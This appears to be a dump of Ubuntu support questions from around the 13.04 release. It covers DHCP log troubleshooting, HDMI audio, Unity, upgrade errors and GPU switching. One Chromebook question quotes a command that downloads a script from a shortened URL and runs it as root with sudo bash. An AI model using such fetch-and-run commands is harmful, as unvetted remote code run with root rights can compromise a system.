eth0 ) : dhcpv4 state changed nbi - > preinit apr 26 01:43:58 myhost dhclient : listening on lpf/eth0/d4:3d:7e:4b:47 : dc apr 26 01:43:58 myhost dhclient : sending on lpf/eth0/d4:3d:7e:4b:47 : dc apr 26 01:43:58 myhost dhclient : sending on socket/fallback apr 26 01:43:58 myhost dhclient : dhcprequest of 192.160.0.200 on eth0 to 255.255.255.255 port 67 apr 26 01:43:58 myhost dhclient : dhcpack of 192.160.0.200 from 192.168.0.1 apr 26 01:43:58 myhost dhclient : bound to 192.160.0.200 -- renewal in 2896 seconds . apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > reboot apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > address 192.160.0.200 apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > prefix 24 ( 255.255.255.0 ) apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > gateway 192.168.0.1 apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > nameserver '192.168.0.1' apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... apr 26 01:43:58 myhost avahi-daemon [ 904 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.160.0.200 . apr 26 01:43:58 myhost avahi-daemon [ 904 ] : new relevant interface eth0.ipv4 for mdns . apr 26 01:43:58 myhost avahi-daemon [ 904 ] : registering new address record for 192.160.0.200 on eth0.ipv4 . apr 26 01:43:59 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] apr 26 01:43:59 myhost networkmanager [ 899 ] : < info > ( ( null ) ) : writing resolv.conf to /sbin/resolvconf apr 26 01:43:59 myhost dnsmasq [ 2395 ] : setting upstream servers from dbus apr 26 01:43:59 myhost dnsmasq [ 2395 ] : using nameserver 192.168.0.1 # 53 apr 26 01:43:59 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) successful , device activated . apr 26 01:43:59 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . apr 26 01:43:59 myhost ntpdate [ 11793 ] : no servers can be used , exiting apr 26 01:44:00 myhost avahi-daemon [ 904 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :d63d:7eff : fe4b:47dc . apr 26 01:44:00 myhost avahi-daemon [ 904 ] : new relevant interface eth0.ipv6 for mdns . apr 26 01:44:00 myhost avahi-daemon [ 904 ] : registering new address record for fe80 : :d63d:7eff : fe4b:47dc on eth0.* . apr 26 01:44:18 myhost networkmanager [ 899 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . apr 26 01:44:18 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 26 01:44:18 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 26 01:44:18 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . a fresh additional info : tp-link is plugged into lan port in netgear ( because internet is in netgear 's wan ) and this is tp-link 's wan - so correct . now another issue : i restarted connection , lost it , when i plugged wire of and on again tp-link listed my ubuntu with correct ip 192.168.0.200 under dhcp clients list and in arp list there is my ubuntu mac mapped into this ip so it seems likr tp-link sees and recognizes my host correctly but host itself says no connection , again : kill dhcpcd eth0 and start it again gives me info that on host ip is configured correctly . however this time i did kill instead of -9 and i have info : interface eth0 has been configured with new ip=192.168.0.202 instead of 192.168.0.200 log info from syslog : apr 26 13:40:53 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 26 13:40:53 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 26 13:40:53 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . apr 26 13:40:57 myhost dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 6 apr 26 13:41:03 myhost dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 14 apr 26 13:41:17 myhost dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 21 apr 26 13:41:18 myhost networkmanager [ 899 ] : < warn > ( eth0 ) : dhcpv4 request timed out . apr 26 13:41:18 myhost networkmanager [ 899 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 27266 apr 26 13:41:18 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... apr 26 13:41:18 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... apr 26 13:41:18 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] apr 26 13:41:18 myhost networkmanager [ 899 ] : < warn > activation ( eth0 ) failed for connection 'wired connection 1' apr 26 13:41:18 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . apr 26 13:41:18 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] apr 26 13:41:18 myhost networkmanager [ 899 ] : < info > ( eth0 ) : deactivating device ( reason 'none ' ) [ 0 ] apr 26 13:41:18 myhost avahi-daemon [ 904 ] : withdrawing address record for fe80 : :d63d:7eff : fe4b:47dc on eth0 . apr 26 13:41:18 myhost avahi-daemon [ 904 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :d63d:7eff : fe4b:47dc . apr 26 13:41:18 myhost avahi-daemon [ 904 ] : interface eth0.ipv6 no longer relevant for mdns . apr 26 13:41:20 myhost avahi-daemon [ 904 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :d63d:7eff : fe4b:47dc . apr 26 13:41:20 myhost avahi-daemon [ 904 ] : new relevant interface eth0.ipv6 for mdns . apr 26 13:41:20 myhost avahi-daemon [ 904 ] : registering new address record for fe80 : :d63d:7eff : fe4b:47dc on eth0.* . apr 26 13:41:21 myhost kernel : [ 385757.629853 ] r8169 0000:02:00.0 : eth0 : link down apr 26 13:41:21 myhost networkmanager [ 899 ] : < info > ( eth0 ) : carrier now off ( device state 30 ) apr 26 13:41:21 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : disconnected - > unavailable ( reason 'carrier-changed ' ) [ 30 20 40 ] apr 26 13:41:21 myhost networkmanager [ 899 ] : < info > ( eth0 ) : deactivating device ( reason 'carrier-changed ' ) [ 40 ] apr 26 13:41:21 myhost networkmanager [ 899 ] : < info > auto-activating connection 'wired connection 1 ' . apr 26 13:41:21 myhost networkmanager [ 899 ] : < info > connection 'wired connection 1 ' auto-activation failed : ( 2 ) device not managed by networkmanager or unavailable apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : carrier now on ( device state 20 ) apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : unavailable - > disconnected ( reason 'carrier-changed ' ) [ 20 30 40 ] apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > auto-activating connection 'wired connection 1 ' . apr 26 13:41:29 myhost kernel : [ 385766.209134 ] r8169 0000:02:00.0 : eth0 : link up apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > dhclient started with pid 27276 apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) beginning ip6 addrconf . apr 26 13:41:29 myhost avahi-daemon [ 904 ] : withdrawing address record for fe80 : :d63d:7eff : fe4b:47dc on eth0 . apr 26 13:41:29 myhost avahi-daemon [ 904 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :d63d:7eff : fe4b:47dc . apr 26 13:41:29 myhost avahi-daemon [ 904 ] : interface eth0.ipv6 no longer relevant for mdns . apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . apr 26 13:41:29 myhost dhclient : internet systems consortium dhcp client 4.2.4 apr 26 13:41:29 myhost dhclient : copyright 2004-2012 internet systems consortium . apr 26 13:41:29 myhost dhclient : all rights reserved . apr 26 13:41:29 myhost dhclient : for info , please visit https : //www.isc.org/software/dhcp/ apr 26 13:41:29 myhost dhclient : apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit apr 26 13:41:29 myhost dhclient : listening on lpf/eth0/d4:3d:7e:4b:47 : dc apr 26 13:41:29 myhost dhclient : sending on lpf/eth0/d4:3d:7e:4b:47 : dc apr 26 13:41:29 myhost dhclient : sending on socket/fallback apr 26 13:41:29 myhost dhclient : dhcprequest of 192.160.0.200 on eth0 to 255.255.255.255 port 67 apr 26 13:41:29 myhost dhclient : dhcpnak from 192.168.1.1 apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > expire apr 26 13:41:29 myhost dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : dhcpv4 state changed expire - > preinit apr 26 13:41:29 myhost dhclient : dhcprequest of 192.168.1.3 on eth0 to 255.255.255.255 port 67 apr 26 13:41:29 myhost dhclient : dhcpoffer of 192.168.1.3 from 192.168.1.1 apr 26 13:41:29 myhost dhclient : dhcpack of 192.168.1.3 from 192.168.1.1 apr 26 13:41:29 myhost dhclient : bound to 192.168.1.3 -- renewal in 32841 seconds . apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > bound apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > address 192.168.1.3 apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > prefix 24 ( 255.255.255.0 ) apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > gateway 192.168.1.1 apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > nameserver '192.168.1.1' apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > domain name 'chello.pl' apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 26 13:41:29 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... apr 26 13:41:29 myhost avahi-daemon [ 904 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.1.3 . apr 26 13:41:29 myhost avahi-daemon [ 904 ] : new relevant interface eth0.ipv4 for mdns . apr 26 13:41:29 myhost avahi-daemon [ 904 ] : registering new address record for 192.168.1.3 on eth0.ipv4 . apr 26 13:41:30 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] apr 26 13:41:30 myhost networkmanager [ 899 ] : < info > ( ( null ) ) : writing resolv.conf to /sbin/resolvconf apr 26 13:41:30 myhost dnsmasq [ 2395 ] : setting upstream servers from dbus apr 26 13:41:30 myhost dnsmasq [ 2395 ] : using nameserver 192.168.0.1 # 53 apr 26 13:41:30 myhost dnsmasq [ 2395 ] : using nameserver 192.168.1.1 # 53 apr 26 13:41:30 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) successful , device activated . apr 26 13:41:30 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . apr 26 13:41:30 myhost dbus [ 876 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 26 13:41:30 myhost dbus [ 876 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 26 13:41:30 myhost named [ 12135 ] : invalid command from 127.0.0.1 # 46668 : bad auth apr 26 13:41:31 myhost avahi-daemon [ 904 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :d63d:7eff : fe4b:47dc . apr 26 13:41:31 myhost avahi-daemon [ 904 ] : new relevant interface eth0.ipv6 for mdns . apr 26 13:41:31 myhost avahi-daemon [ 904 ] : registering new address record for fe80 : :d63d:7eff : fe4b:47dc on eth0.* . apr 26 13:41:49 myhost networkmanager [ 899 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . apr 26 13:41:49 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 26 13:41:49 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 26 13:41:49 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . apr 26 13:42:03 myhost dhcpcd [ 27383 ] : eth0 : dhcpcd already running on pid 11852 ( /var/run/dhcpcd-eth0.pid ) apr 26 13:42:03 myhost dhcpcd [ 27383 ] : eth0 : exiting apr 26 13:42:11 myhost ntpdate [ 27364 ] : ca n't find host ntp.ubuntu.com : name or service not known ( -2 ) apr 26 13:42:11 myhost ntpdate [ 27364 ] : no servers can be used , exiting apr 26 13:42:45 myhost dhcpcd [ 11852 ] : eth0 : received sigterm , stopping apr 26 13:42:45 myhost dhcpcd [ 11852 ] : eth0 : removing default route via 192.168.0.1 metric 0 apr 26 13:42:45 myhost dhcpcd [ 11852 ] : eth0 : netlink : no such process apr 26 13:42:45 myhost dhcpcd [ 11852 ] : eth0 : removing route to 169.254.0.0/16 metric 0 apr 26 13:42:45 myhost dhcpcd [ 11852 ] : eth0 : removing ip address 192.160.0.200/24 apr 26 13:42:45 myhost dhcpcd [ 11852 ] : eth0 : netlink : can not assign requested address apr 26 13:42:45 myhost dhcpcd [ 11852 ] : eth0 : exiting apr 26 13:42:45 myhost dhcpcd.sh : interface eth0 has been brought down apr 26 13:43:01 myhost dhcpcd [ 27430 ] : eth0 : dhcpcd 3.2.3 starting apr 26 13:43:01 myhost dhcpcd [ 27430 ] : eth0 : hardware address = d4:3d:7e:4b:47 : dc apr 26 13:43:01 myhost dhcpcd [ 27430 ] : eth0 : removing ip address 192.168.1.3/24 apr 26 13:43:01 myhost avahi-daemon [ 904 ] : withdrawing address record for 192.168.1.3 on eth0 . apr 26 13:43:01 myhost avahi-daemon [ 904 ] : leaving mdns multicast group on interface eth0.ipv4 with address 192.168.1.3 . apr 26 13:43:01 myhost avahi-daemon [ 904 ] : interface eth0.ipv4 no longer relevant for mdns . apr 26 13:43:01 myhost dhcpcd [ 27430 ] : eth0 : duid = 00:01:00:01:18 : ab : f5 : fd : d4:3d:7e:4b:47 : dc apr 26 13:43:01 myhost dhcpcd [ 27430 ] : eth0 : broadcasting for a lease apr 26 13:43:02 myhost dhcpcd [ 27430 ] : eth0 : offered 192.160.0.202 from 192.168.0.1 apr 26 13:43:02 myhost dhcpcd [ 27430 ] : eth0 : checking 192.160.0.202 is available on attached networks apr 26 13:43:03 myhost dhcpcd [ 27430 ] : eth0 : leased 192.160.0.202 for 7200 seconds apr 26 13:43:03 myhost dhcpcd [ 27430 ] : eth0 : no renewal time supplied , assuming 3600 seconds apr 26 13:43:03 myhost dhcpcd [ 27430 ] : eth0 : no rebind time supplied , assuming 6300 seconds apr 26 13:43:03 myhost dhcpcd [ 27430 ] : eth0 : adding ip address 192.160.0.202/24 apr 26 13:43:03 myhost dhcpcd [ 27430 ] : eth0 : adding default route via 192.168.0.1 metric 0 apr 26 13:43:03 myhost dhcpcd [ 27430 ] : eth0 : adding route to 169.254.0.0/16 metric 0 apr 26 13:43:03 myhost dhcpcd [ 27430 ] : eth0 : exiting apr 26 13:43:03 myhost avahi-daemon [ 904 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.160.0.202 . apr 26 13:43:03 myhost avahi-daemon [ 904 ] : new relevant interface eth0.ipv4 for mdns . apr 26 13:43:03 myhost avahi-daemon [ 904 ] : registering new address record for 192.160.0.202 on eth0.ipv4 . apr 26 13:43:03 myhost dhcpcd.sh : interface eth0 has been configured with new ip=192.160.0.202 apr 26 13:53:12 myhost named [ 26017 ] : listening on ipv4 interface eth0 , 192.160.0.202 # 53 apr 26 13:53:12 myhost named [ 26017 ] : no longer listening on 192.160.0.200 # 53
285624	ubuntu 13.04 not detect the hdmi sound output	so , i have maded the upgrade to ubuntu v.13.04 , but , when i have maded this , my hdmi sound otuput sttoped to work ... and , the hdmi sound device not appers any more on sound preferences : ( when i run lspci : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) that is the output ... so , how i can detect my hdmi sound output , and use my hdmi oudio ? ?
285626	how to list all available apps on my machine	i am using ubuntu 12.10 , with the unity dash . i would like to list all available apps on my machine . start menu style in other words . dash is hard for me to use unless i know the name of what i am looking for .
285627	unity does not start in ubuntu 13.04	i have upgraded to ubuntu 13.04 and i can not use unity . i have tried the proprietary driver , both from the official sources and from amd 's website . i have also tried using the open source x.org driver , and under no configuration does unity start . xubuntu and lubuntu configurations start correctly on the same setup . this problem only existed in 12.10 after a kernel upgrade and was fixed by reinstalling the drivers . reinstalling no longer fixes the problem . i have also tried purging compiz and then reinstalling unity , and that did not solve the problem . when i run unity i see no errors , but it stops at : compiz ( core ) - info : starting plugin : session no more output appears in the terminal . i am currently using the proprietary driver that you install through the update manager ( which i accessed with xubuntu ) . so my question is ; where can i begin to diagnose the source of this problem , or does anybody have a solution ?
285629	unable to connect to the internet in 13.04 but fine in 12.04	i just installed ubuntu 13.04 . unfortunately , i ca n't access the internet . the same problem occurred with u 12.10 . but with u 12.04 it 's working perfectly well .
285630	ubuntu server continues to want to upgrade after already fully upgrading	i upgraded my servers from 12.10 to 13.04 via ssh session . all upgrades for each box were successful except for one , which failed to boot after rebooting ( faulty harddrive it turns out ) . after replacing the hdd , i did a fresh install of 13.04. here is my log : http : //paste.ubuntu.com/5602791/ please note that box0 is a fresh install of 13.04 and it does not ask me to upgrade my os everytime i log in . now note that box1 is an upgrade from 12.10 to 13.04 and it continues to ask me to upgrade everytime i log in ; see lines 32 and 33 . why does it do this , and how do i fix it ?
285634	can not upgrade ubuntu server to 13.04 using command line	i am trying to upgrade ubuntu server from 12.10 to 13.04 using command line . i get the follow error when i do this command `` sudo do-release-upgrade -d '' : $ sudo do-release-upgrade -d checking for a new ubuntu release traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 145 , in < module > fetcher.run_options += [ `` -- mode= % s '' % options.mode , attributeerror : type object 'distupgradefetchercore ' has no attribute 'run_options' do you have any idea how to fix this ? thank you .
285635	only one workspace after upgrade to 13.04	title says it all . where can i add workspaces - looked into compizconfig but i was not able to find a tab where i can specify the # of workspaces . i used to have 2x2 and that 's what i 'm looking for .
285637	ubuntu 13.04 will not erase previous ubuntu with raid	when trying to do a clean installation of ubuntu 13.04 on a system that has a raid controller and raid5 volume set and also had ubuntu 11.04 installed will not allow me to delete the raid or even configure the boot partition . every time i try to delete the raid members , it refuses indicating the partition is part of a raid . when i try to use the option to erase the previous version , it simply loops to the previous screen .
285640	ubuntu 12.10 stranger error on start up	when i start ubuntu 12.10 , after i enter the password , and my desktop show i get a `` send error report '' message ... every single time ? i submit the error report and still nothing ... . anyone have this problem ?
285642	skype crashes with a segmentation fault	under 13.04 , skype is crashing with a seg fault . $ skype segmentation fault ( core dumped ) $ how can i fix this ?
285643	ubuntu 12.10 became kubuntu 13.04	i upgraded ubuntu 12.10 to ubuntu 13.04 using the update manager . after upgrading i 've just restarted and there 's a splash sreen with kubuntu logo . i ca n't login to my ubuntu account . i had installed kde desktop manager but uninstalled it before upgrading . help : )
285646	projector ( external/internal combo ) icons while switching - how ?	external vga connected monitor with laptop . on windows when you press the projector hotkey/fn key on a laptop , you see a list of options or combinations of external projector and onboard screen , it looks like the alt-tab switcher on any desktop . that way , you know which combination you will get before you let go and can cycle through them in your own order , no need to try out each one to get to the one you want . on ubuntu 12.04 ?
285647	bumblebee issue with 13.04	bumblebee can not access my gpu optirun -vv glxspheres [ 1731.443943 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 1731.445149 ] [ debug ] optirun version 3.1 starting ... [ 1731.445191 ] [ debug ] active configuration : [ 1731.445202 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 1731.445214 ] [ debug ] x display : :8 [ 1731.445224 ] [ debug ] ld_library_path : /usr/lib/nvidia-304 : /usr/lib32/nvidia-304 [ 1731.445234 ] [ debug ] socket path : /var/run/bumblebee.socket [ 1731.445244 ] [ debug ] accel/display bridge : auto [ 1731.445254 ] [ debug ] vgl compression : proxy [ 1731.445307 ] [ debug ] using auto-detected bridge virtualgl [ 1731.475930 ] [ info ] response : no - error : [ xorg ] ( ee ) no devices detected . [ 1731.475994 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 1731.476053 ] [ debug ] socket closed . [ 1731.476114 ] [ error ] aborting because fallback start is disabled . [ 1731.476134 ] [ debug ] killing all remaining processes . i thought this issue might have been resolved as raring is now listed as supported in the wiki https : //wiki.ubuntu.com/bumblebee my gpu is listed when running lspci lspci |grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf106m [ geforce gt 555m ] ( rev a1 ) does anyone have a working solution ?
285648	syntax error near unexpected token `newline ' c7 error when i try to install ubuntu 12.04 on my chromebook	i have a c7 and everything works fine until i type the wget line : wget http : //go.gl/tnyga ; sudo bash tnyga ... ... when i press enter it says : tnyga : line 1 : syntax error near unexpected token `newline ' tnyga : line 1 : ` < < html > > `
285652	how can i disable ubuntuone-client from running everytime i login ?	i need to manually do 'ps and kill -9 ' to kill it .
285653	i ca n't share internet in ubuntu 13.04 with a windows device like i could in 12.10	i have ipv4 set to share internet , but with my windows machine it will work for a few minutes and then just stop working . can anyone tell me if there 's a new way to do this , or if it is broken in this build at the moment ? ***fix well , i found a fix that worked for me . the problem for me was in the new linux kernal 3.8 . so i rebooted my pc and held shift to go to grub manager . from there i selected ubuntu advanced options and selected kernal 3.5 and it works fine for me now .
285656	ca n't remap `` expo '' in compizconfig for 13.04	currently , the shortcut for expo ( showing all workspaces ) is super + s. i can change the shortcut in the compiz settings manager , however , no shortcuts that i set work for expo . in fact , even if i set different keyboard shortcuts , super + s continues to work . why is n't the shortcut changing ?
285661	ubuntu and the hp envy 15t-3200	could someone post a tutorial on making ubuntu 13.04 work with the hp envy 15t-3200 ? i own this laptop , and have had to use windows so far . : ( there are several problems ( touchpad , sound , etc ) , but by far the biggest is : hybrid graphics . this laptop has intel 4000 / amd 7750m graphics , and i have n't been able to get it working on ubuntu with either prop . or open source drivers . the drivers crash , or i do n't get to the desktop . the predominant guide on amd hybrid graphics and ubuntu seems to be : http : //ubuntuforums.org/showthread.php ? t=1930450 i have tried the contents of this guide , and it does n't work on this laptop . after the final reboot , i get a blank screen with the wallpaper , but no desktop / launcher / menus , and i need to force restart . will be offering a bounty on this question soon . if anyone answers now , i 'll also add a bounty when it 's available ( in 2 days , i think ) .
285664	problems with slow pocessor laptop	there is something that bothers me a lot a it-s that : i have an compaq presario cq43 172la , this pc works with an 1.5ghz amd e/240 and amd hd 6310 apu and 1.6 ddr3 ram memory . by default it came with win 7 starter pre-installed , i changed that and installed windows home premium . with windows 7 starter i could play hd videos even blue ray rip movies but lately i could n't then my hdd stop working . when i bought another i thought to download and install a linux distro and decided that should be ubuntu because i had another pc with it and i had n't problems with it , the 9.10 one to be precise . once installed ( ubuntu 12.10 ) i decided to watch one of my favorite movies , right now `` the avengers '' , in brrip and i noticed i could n't . i installed all the codecs and privatives drivers necessary and followed some tutorials and nothing . i installed fuduntu once before my hard disk crashed and i did i could watch my movies . so please someone tell me why ca n't i watch hd movies and movies if i used to do it with win 7 which is heavier ? .
285669	will i have problems updating to 13.04 when 12.10 was installed using wubi ?	basically , that 's what i 'm trying to figure out . how can i install the latest version without using wndows ?
285672	is possible to update from 12.04 to 13.04 ?	the only option update manager gives me is to update to 12.10 do i have to update to 12.10 in order to get 13.04 ?
285677	how do i copy data from two computers connected with cross-over cable ?	a tech friend installed ubuntu 10.04 on an older dell desktop ( pentium 4 ) ; it has an odd memory/unmatched tabs pair but he installed something that compensates for that . i can use the kde lightweight desktop but if i try to use gnome ( more features ) my mouse quits working . he told me not to upgrade to any higher versions since i 'm a linux newbie and 10.04 makes more sense for learning . i have 12.04 lts installed on another system and am more or less clueless how to identify & install packages with missing dependencies . anyway i have data on the 12.04 system that i want to move to the 10.04 ( back-up ) system , have cross-over cable installed but need to know how to create permissions on both systems so they can `` see '' what 's on the other . thank you in advance for any help .
285679	how do i allow local subnets in ufw ?	i recently got ipv6 connectivity at home and now i would like to allow connections to my home server via ipv6 from the lan only . the trick is that the ipv6 address/prefix assigned to the server is dynamic . is there some way to write a ufw rule that allows only from directly connected subnets ?
285680	is vim-gnome fuzzyfinder plugin broken since ubuntu 13.04 ?	after ubuntu 13.04 installation i simply unzip an archive with all my gvim setup , ie . .vim/ .vim-fuf .viminfo .vimrc after doing a clean install of ubuntu 13.04 , i unzipped my vim config as usual . when i pressed the shortcut for fuzzyfinder that shows a dropdown of file matches , it displayed a red error at bottom : error detected while processing function fuf # oncomplete..15..14.. < snr > 23_setranks.. < snr > 23_scoresequentialmatching : line 2 : e806 : using float as a string has there been a recent rebuild of vim-gnome that would explain this errror ? i 'm on 7.3.547 . the .vim folder is extremely portable , i 've used it accross windows , linuxmint , mac os , and never came across this error , which is why i am wondering if this could be an error in the vim build itself . update i also deleted .vim-fuf and .viminfo just in case , and the error stills appears .
285685	is someone going to make unity revamped for 13.04 ( or your opinion on it ) ?	what is keeping me to upgrade to 13.04 from 12.04.2 is unity revamped , i need my dodge windows asap ! ! ! i was just wondering what is your opinion about this ? do you think that this is going to happen ? and i do n't like the bash file that does it , it is too buggy and so is 12.10 too .
285686	installing drivers from the intel website	alright , i need to know how to install the drivers from the intel website , i have tried running the shell files but they launch as a text file would , so i am quite lost the computer in which the driver is being installed on is a acer aspire 5733z-4633 my specs as of now ubuntu 13.04 intel ironlake mobile 3.5 gib usable ram intelâž pentium ( r ) cpu p6200 @ 2.13ghz ă 2 os type : 64-bit
285689	increase mouse wheel scroll speed	as the title says , i want to increase the number of rows that are passed when i use the mouse wheel for scrolling . i know that there exists ways to do that for firefox and chromium , although i want something for the entire system , mainly because of the pdf reader . i am on a desktop and use a microsoft wireless mouse 5000 .
